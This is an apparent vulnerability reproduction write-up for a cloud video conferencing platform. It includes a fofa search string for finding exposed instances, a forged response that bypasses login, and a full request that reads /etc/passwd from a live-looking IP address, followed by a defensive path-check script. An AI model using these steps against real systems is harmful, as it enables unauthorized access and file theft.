I. Description
The 会捷通云视讯平台 (a cloud video conferencing platform) has a login bypass vulnerability: by modifying the server's response, the backend login can be bypassed, after which arbitrary operations (delete, restart, upgrade, reset, and so on) can be performed. An arbitrary file read vulnerability also exists.
II. Affected scope
会捷通云视讯平台
III. Vulnerability reproduction
fofa search: body=“/him/api/rest/v1.0/node/role
1. Login bypass vulnerability
Test the login page.
Log in with an arbitrary password (admin/123456) and intercept the packet.
Normal response: a password-error message.
Modify the response, replacing its contents with the following:
HTTP/1.1 200
Server: Hsengine/1.4.1
Date: Fri, 09 Jul 2021 07:40:06 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Accept-Ranges: bytes
Vary: Accept-Charset, Accept-Encoding, Accept-Language, Accept
Content-Length: 61
{"token":null,"result":null}
Release the intercepted packet; you land in the system backend.
2. Unauthenticated arbitrary file read
Visit the vulnerable URL:
/fileDownload?action=downloadBackupFile
Capture the request, as shown in the figure below.
Then, via the “fullPath=” parameter, arbitrary files can be read, as shown in the figure:
POST /fileDownload HTTP/1.1
Host: 36.99.192.142:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: td_cookie=3499227148
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
action=downloadBackupFile&fullPath=/etc/passwd
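As an added defensive example (not code from this write-up or from the vendor), the following Python shows the server-side containment check the downloadBackupFile action is missing and applies it to a captured /fileDownload request; the BACKUP_DIR location and the sample requests are constructed assumptions.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs

BACKUP_DIR = "/opt/him/backup"   # assumed location of legitimate backup files

def is_within_backup_dir(full_path, base=BACKUP_DIR):
    """True only if full_path resolves to a file below base.
    posixpath.join() discards base when full_path is absolute, and normpath
    collapses "..", so "/etc/passwd" and "../../etc/passwd" both end up
    outside base and are rejected; an empty value is rejected too."""
    base = posixpath.normpath(base)
    resolved = posixpath.normpath(posixpath.join(base, full_path))
    return resolved.startswith(base + "/")

def classify_download_request(raw):
    """Parse a raw HTTP request (request line, headers, form body) and return
    ("ok" | "suspicious" | "ignore", fullPath). Parameters may arrive in the
    query string (as in the initial GET) or in the POST body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target = head.split("\n", 1)[0].split(" ")[:2]
    url = urlsplit(target)
    if url.path != "/fileDownload":
        return ("ignore", None)
    params = {**parse_qs(url.query), **parse_qs(body.strip())}
    if params.get("action") != ["downloadBackupFile"]:
        return ("ignore", None)
    full_path = params.get("fullPath", [""])[0]
    verdict = "ok" if is_within_backup_dir(full_path) else "suspicious"
    return (verdict, full_path)

# Constructed samples: the shape of the request in the write-up, and a benign
# download of a file that actually lives under the backup directory.
SAMPLE_BAD = ("POST /fileDownload HTTP/1.1\r\nHost: target.example:9090\r\n"
              "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
              "action=downloadBackupFile&fullPath=/etc/passwd")
SAMPLE_OK = ("POST /fileDownload HTTP/1.1\r\nHost: target.example:9090\r\n"
             "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
             "action=downloadBackupFile&fullPath=2021-07-09/config.bak")

if __name__ == "__main__":
    for sample in (SAMPLE_BAD, SAMPLE_OK):
        print(classify_download_request(sample))
```

The same check, applied before the file is opened, is the fix: the handler should refuse any fullPath that does not resolve below the backup directory, and a proxy or log pipeline can use the classifier to flag requests that do not.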